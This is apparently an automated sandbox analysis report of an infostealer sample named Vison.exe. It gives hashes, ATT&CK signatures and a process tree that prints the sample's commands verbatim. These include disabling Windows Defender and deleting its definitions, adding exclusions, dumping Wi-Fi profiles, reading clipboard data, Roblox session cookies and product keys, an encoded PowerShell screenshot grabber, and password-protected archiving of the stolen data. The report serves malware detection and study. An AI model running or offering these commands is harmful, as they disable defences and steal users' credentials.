Resubmissions

15-11-2024 14:28

241115-rs8z1avkd1 10

15-11-2024 12:03

241115-n75z4stene 10

Analysis

  • max time kernel
    100s
  • max time network
    142s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    15-11-2024 12:03

General

  • Target

    Vison.exe

  • Size

    7.4MB

  • MD5

    583cc9030380ba9d63733cf4c2f250a4

  • SHA1

    6e022259bb74daadd9948812500ea5b6e7d2a75b

  • SHA256

    595c43bd746df84e47ece1ae6225ccf7258ed59b621a8d6c00f888a51f2528d7

  • SHA512

    f68ce48d118439d1133fb476a8a4752b336e2354665a769bc46af8252755e92377ac5482aa836190c151115d4d7811f22ccf801213f2fd7aa918c1ea5362eeab

  • SSDEEP

    196608:I2P9VBNEurErvI9pWjgfPvzm6gsFE14A1:RlNEurEUWjC3zDb04A1

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 47 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Vison.exe
    "C:\Users\Admin\AppData\Local\Temp\Vison.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:732
    • C:\Users\Admin\AppData\Local\Temp\Vison.exe
      "C:\Users\Admin\AppData\Local\Temp\Vison.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3684
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Vison.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3340
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Vison.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1020
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:100
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3676
        • C:\Program Files\Windows Defender\MpCmdRun.exe
          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
          4⤵
          • Deletes Windows Defender Definitions
          PID:544
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error Build.dll Not Found', 0, 'error', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:228
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error Build.dll Not Found', 0, 'error', 0+16);close()"
          4⤵
            PID:3136
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎  .scr'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3924
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎  .scr'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1916
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:704
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2904
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4712
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2660
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3028
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4632
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:2896
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2448
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3880
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:220
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:888
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:4500
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            3⤵
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:988
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              4⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:4084
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4616
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:1108
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4100
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4948
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1tnb5ja3\1tnb5ja3.cmdline"
                5⤵
                  PID:3712
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB12F.tmp" "c:\Users\Admin\AppData\Local\Temp\1tnb5ja3\CSC98B9AC3961C14661A5B71D5BC17AEF.TMP"
                    6⤵
                      PID:988
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2472
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:3320
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4208
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:720
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                    3⤵
                      PID:2268
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4632
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:2168
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:4060
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:3356
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:1040
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:3368
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:3012
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                  3⤵
                                    PID:3188
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                      4⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3192
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "getmac"
                                    3⤵
                                      PID:236
                                      • C:\Windows\system32\getmac.exe
                                        getmac
                                        4⤵
                                          PID:3444
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI7322\rar.exe a -r -hp"oyogz" "C:\Users\Admin\AppData\Local\Temp\3o3ZD.zip" *"
                                        3⤵
                                          PID:4208
                                          • C:\Users\Admin\AppData\Local\Temp\_MEI7322\rar.exe
                                            C:\Users\Admin\AppData\Local\Temp\_MEI7322\rar.exe a -r -hp"oyogz" "C:\Users\Admin\AppData\Local\Temp\3o3ZD.zip" *
                                            4⤵
                                            • Executes dropped EXE
                                            PID:2796
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                          3⤵
                                            PID:3196
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic os get Caption
                                              4⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:396
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                            3⤵
                                              PID:2656
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic computersystem get totalphysicalmemory
                                                4⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:3888
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                              3⤵
                                                PID:2292
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic csproduct get uuid
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4596
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                3⤵
                                                  PID:3168
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2152
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                  3⤵
                                                    PID:3900
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic path win32_VideoController get name
                                                      4⤵
                                                      • Detects videocard installed
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:4588
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                    3⤵
                                                      PID:2892
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1916

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  3KB

                                                  MD5

                                                  e8a95a33bdaa8522f9465fd024c3ec88

                                                  SHA1

                                                  45c15dbb8ab99be8e813aee1ed3e21ad334c8745

                                                  SHA256

                                                  06abbf9cccdf6557b1f616e0c9214c580f1d2be928104a0c8193c2217dd98c1b

                                                  SHA512

                                                  c429d8d5bfba8790a725e9d6eed656b93e69bfa8290ca388cf007aeb82462db39539ce5da4ab00c19e795344119ab14cef915c39503da80a69953e0e2ee2a002

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  64B

                                                  MD5

                                                  50a8221b93fbd2628ac460dd408a9fc1

                                                  SHA1

                                                  7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

                                                  SHA256

